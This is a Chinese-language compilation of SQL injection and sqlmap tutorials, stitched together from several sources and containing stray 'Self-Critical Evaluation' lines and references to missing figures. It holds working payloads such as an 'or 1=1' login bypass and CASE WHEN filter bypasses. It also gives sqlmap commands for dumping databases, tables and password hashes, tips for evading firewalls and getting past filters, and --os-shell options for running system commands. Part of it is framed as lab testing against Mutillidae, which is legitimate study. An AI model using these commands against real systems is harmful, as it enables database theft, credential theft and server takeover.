sqlmap查看当前数据库权限,sqlserver查看数据库权限

怎么判断网站数据库是不是MySQL？ 用sqlmap怎么爆后台帐户名和密码 怎么手工爆？

注入语句如下：

Username: jonnybravo’ or 1=1; –

该注入语句要做的就是从数据库查询用户jonnybravo，获取数据后立刻终止查询（利用单引号），之后紧接着一条OR语句，由于这是一条“if状态”查询语句，而且这里给出 “or 1＝1”，表示该查询永远为真。1=1表示获取数据库中的所有记录，之后的;–表示结束查询，告诉数据库当前语句后面没有其它查询语句了。

图1 正常方式查看用户信息

将payload注入后，服务器泄露了数据库中的所有用户信息。如图2所示：

图2 注入payload导致数据库中所有数据泄露

至此，本文向读者演示了一种基本SQL注入，下面笔者用BackTrack和Samurai 等渗透测试发行版中自带的SQLmap工具向读者演示。要使用SQLmap，只需要打开终端，输入SQLmap并回车，如下图所示：

如果读者首次使用SQLmap，不需要什么预先操作。如果已经使用过该工具，需要使用—purge-output选项将之前的输出文件删除，如下图所示：

图3 将SQLmap output目录中的原输出文件删除

本文会演示一些比较独特的操作。通常人们使用SQLmap时会直接指定URL，笔者也是用该工具分析请求，但会先用Burp查看请求并将其保存到一个文本文件中，之后再用SQLmap工具调用该文本文件进行扫描。以上就是一些准备工作，下面首先就是先获取一个请求，如下所示：

GET /chintan/index.php?page=user-info.phpusername=jonnybravopassword=mommauser-info-php-submit-button=View+Account+Details HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer:

Cookie: showhints=0; username=jonnybravo; uid=19; PHPSESSID=f01sonmub2j9aushull1bvh8b5

Connection: keep-alive

将该请求保存到一个文本文件中，之后发送到KALI linux中，用如下命令将该请求头部传给SQLmap：

SQLmap –r ~/root/Desktop/header.txt

Self-Critical Evaluation

命令中-r选项表示要读取一个包含请求的文件，~/root/Desktop/header.txt表示文件的位置。如果读者用VMware，例如在Windows上用虚拟机跑KALI，执行命令时可能产生如下图所示的错误提示：

这里必须在请求头中指定一个IP地址，使KALI linux能与XP正常通信，修改如下图所示：

之后命令就能正常执行了，显示结果如下图所示：

基本上该工具做的就是分析请求并确定请求中的第一个参数，之后对该参数进行各种测试，以确定服务器上运行的数据库类型。对每个请求，SQLmap都会对请求中的第一个参数进行各种测试。

GET /chintan/index.php?page=user-info.phpusername=jonnybravopassword=mommauser-info-php-submit-button=View+Account+Details HTTP/1.1

SQLmap可以检测多种数据库，如MySQL、Oracle SQL、PostgreSQL、Microsoft SQL Server等。

下图是笔者系统中SQLmap正在对指定的请求进行检测时显示的数据库列表：

首先它会确定给定的参数是否可注入。根据本文演示的情况，我们已经设置OWASP mutillidae的安全性为0，因此这里是可注入的，同时SQLmap也检测到后台数据库DBMS可能为MYSQL。

如上图所示，工具识别后台数据库可能为MYSQL，因此提示用户是否跳过其它类型数据库的检测。

“由于本文在演示之前已经知道被检测数据库是MYSQL，因此这里选择跳过对其它类型数据库的检测。”

之后询问用户是否引入（include）测试MYSQL相关的所有payload，这里选择“yes”选项：

测试过一些payloads之后，工具已经识别出GET参数上一个由错误引起的注入问题和一个Boolean类型引起的盲注问题。

之后显示该GET参数username是一个基于MYSQL union（union-based）类型的查询注入点，因此这里跳过其它测试，深入挖掘已经找出的漏洞。

至此，工具已经识别出应该深入挖掘的可能的注入点：

接下来，我把参数username传递给SQLmap工具，以对其进行深入挖掘。通过上文描述的所有注入点和payloads，我们将对username参数使用基于Boolean的SQL盲注技术，通过SQLmap中的–technique选项实现。其中选择如下列表中不同的选项表示选用不同的技术：

B : 基于Boolean的盲注（Boolean based blind）

Q : 内联查询（Inline queries）

T : 基于时间的盲注（time based blind）

U : 基于联合查询（Union query based）

E : 基于错误（error based）

S : 栈查询（stack queries）

本例中也给出了参数名“username”，因此最后构造的命令如下：

SQLmap –r ~root/Desktop/header.txt – -technique B – -p username – -current-user

这里-p选项表示要注入的参数，“–current-user“选项表示强制SQLmap查询并显示登录MYSQL数据库系统的当前用户。命令得到输出如下图所示：

同时也可以看到工具也识别出了操作系统名，DBMS服务器以及程序使用的编程语言。

“”当前我们所做的就是向服务器发送请求并接收来自服务器的响应，类似客户端－服务器端模式的交互。我们没有直接与数据库管理系统DBMS交互，但SQLmap可以仍识别这些后台信息。

同时本次与之前演示的SQL注入是不同的。在前一次演示SQL注入中，我们使用的是前缀与后缀，本文不再使用这种方法。之前我们往输入框中输入内容并等待返回到客户端的响应，这样就可以根据这些信息得到切入点。本文我们往输入框输入永远为真的内容，通过它判断应用程序的响应，当作程序返回给我们的信息。“

结果分析

我们已经给出当前的用户名，位于本机，下面看看它在后台做了什么。前文已经说过，后台是一个if判断语句，它会分析该if查询，检查username为jonnybravo且7333＝7333，之后SQLmap用不同的字符串代替7333，新的请求如下：

page=user-info.php?username=’jonnybravo’ AND ‘a’='a’ etc..FALSE

page=user-info.php?username=’jonnybravo’ AND ‘l’='l’ etc..TRUE

page=user-info.php?username=’jonnybravo’ AND ‘s’='s’ etc..TRUE

page=user-info.php?username=’jonnybravo’ AND ‘b’='b’ etc..FALSE

如上所示，第一个和最后一个查询请求结果为假，另两个查询请求结果为真，因为当前的username是root@localhost，包含字母l和s，因此这两次查询在查询字母表时会给出包含这两个字母的用户名。

“这就是用来与web服务器验证的SQL server用户名，这种情况在任何针对客户端的攻击中都不应该出现，但我们让它发生了。”

去掉了–current-user选项，使用另外两个选项-U和–password代替。-U用来指定要查询的用户名，–password表示让SQLmap去获取指定用户名对应的密码，得到最后的命令如下：

SQLmap -r ~root/Desktop/header.txt --technique B -p username -U root@localhost --passwords

命令输出如下图所示：

Self-Critical Evaluation

有时可能没有成功获取到密码，只得到一个NULL输出，那是因为系统管理员可能没有为指定的用户设定认证信息。如果用户是在本机测试，默认情况下用户root@localhost是没有密码的，需要使用者自己为该用户设置密码，可以在MySQL的user数据表中看到用户的列表，通过双击password区域来为其添加密码。或者可以直接用下图所示的命令直接更新指定用户的密码：

这里将密码设置为“sysadmin“，这样SQLmap就可以获取到该密码了，如果不设置的话，得到的就是NULL。

通过以上方法，我们不直接与数据库服务器通信，通过SQL注入得到了管理员的登录认证信息。

总结

本文描述的注入方法就是所谓的SQL盲注，这种方法更繁琐，很多情况下比较难以检测和利用。相信读者已经了解传统SQL注入与SQL盲注的不同。在本文所处的背景下，我们只是输入参数，看其是否以传统方式响应，之后凭运气尝试注入，与之前演示的注入完全是不同的方式。

网络sqlmap什么意思

1. 基础用法：

./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库

./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库

./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户

./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户

./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名

./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库” // 获取表的列名

./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据，包含列

已经开始拖库了，SQLMAP是非常人性化的，它会将获取的数据存储sqlmap/output/中、、、

2. sqlmap post注入

我们在使用Sqlmap进行post型注入时，

经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧，即结合burpsuite来使用sqlmap，

用这种方法进行post注入测试会更准确，操作起来也非常容易。

1. 浏览器打开目标地址http:// /Login.asp

2. 配置burp代理(127.0.0.1:8080)以拦截请求

3. 点击login表单的submit按钮

4. 如下图，这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

怎么用sqlmap中的指令找到数据库文件的物理地址

输入命令sqlmap-u+“风险网址”检测是否存在sql注入漏洞。看到返回了服务器的类型，web环境，数据库类型。确定存在漏洞我们开始下一步的注入。根据返回的数据库类型我们确定数据库为access数据库。使用--tables猜解表。猜解完表格后我们进一步猜解表的内容。命令：pythonsqlmap.py-uURL-Tadmin--columns注意暴力破解的线程数最大为10，其他的参数可以直接回车。猜解完表的内容我们可以直接猜解表列的内容。5等待一段时间后，程序工作完毕，查看结果。

sqlmap 要到当前的管理员没有权限读取数据怎么办

TIP1

当我们注射的时候，判断注入

# 相当于 id=10(select 10) # 相当于 id=10 and 1=1 #失败

通过判断可发现and和or被过滤

– # 失败;– #失败);– #失败)subquery;– #失败

你可以用burp的intruder的字典跑，但是仍然失败。

这里可以用到SQL语句的case when …then … else … end语句

CASE WHEN语句在DB2,ORACLE,SQL SERVER系列,SYBASE等大型数据库都受到支持，是标准的SQL语句。

可以这样子理解：CASE… WHEN… THEN …ELSE …END

CASE WHEN 语法有两种情况:

第一种是CASE 后面不带表达式的;

CASE WHEN expression THEN 操作1

WHEN expression THEN 操作2

.......

ELSE 操作n

END

第二种是CASE 后面带表达式的(而此时WHEN 后面的则是该表达式可能的值)，通用。

CASE expression

WHEN expression值1 THEN 操作1

WHEN expression值2 THEN 操作2

.......

ELSE 操作n

END

-(case when 1=1 then 1 else 0 end)

用1=1跟1=2测试

# 当条件为真的时候

# 当条件为假的时候

可以很明显的看到返回不同,然后可以判断注入。那么怎么能让sqlmap去识别呢?

Sqlmap默认是自己寻找注入点的,但是你加上一个*,可以引导他。

语句

sqlmap.py -u -(case when 1=1星号 then 1)

注入最头痛的就是遇到过滤,sqlmap提供了字符转换的功能

“–tamper=between”当然自己可以改写转换内容,文件在/tamper目录下。

关于post注入 sqlmap可以用-r参数 加载数据包

sqlmap.py -r post.txt

继续补充一点: having xor等逻辑符号也可以判断注入。

TIP2

POST注入

有两种方法来进行post注入，一种是使用--data参数，将post的key和value用类似GET方式来提交。二是使用-r参数，sqlmap读取用户抓到的POST请求包，来进行POST注入检测。

查看payload

之前一直是加本地代理，然后用burpsuit来看sqlmap的payload，到现在才发现用-v参数就可以实现。一直认为-v实现的只是控制警告，debug信息级别。实际上使用-v 3就可以显示注入的payload，4,5,6还可以显示HTTP请求，HTTP响应头和页面。

使用google搜索

sqlmap可以测试google搜索结果中的sql注入，很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。

请求延时

在注入过程中请求太频繁的话可能会被防火墙拦截，这时候--delay参数就起作用了。可以设定两次HTTP请求间的延时。有的web程序会在多次错误访问后屏蔽所有请求，这样就导致之后所有的测试无法进行，绕过这个策略可以使用--safe-url，每隔一段时间去访问一个正常的页面。

伪静态页面

有些web服务器进行了url rewrite或者网站是伪静态的，无法直接提供测试参数，这样子可以使用*来代替要测试的参数。

执行系统命令

当数据库支持，并且当前用户有权限的时候，可以执行系统命令，使用--os-cmd或者--os-shell，具体的讲，当可以执行多语句的时候，会尝试用UDF(MySQL，PostgrepSQL)或者xp_cmdshell(MSSQL)来执行系统命令。不能执行多语句时，仍然会尝试创建一个webshell来执行语句，这时候就需要web的绝对路径了。总体来说，成功率偏低，不过个人也有成功的经验～

测试等级

sqlmap使用--level参数来进行不同全面性的测试，默认为1，不同的参数影响了使用哪些payload，2时会进行cookie注入检测，3时会进行useragent检测。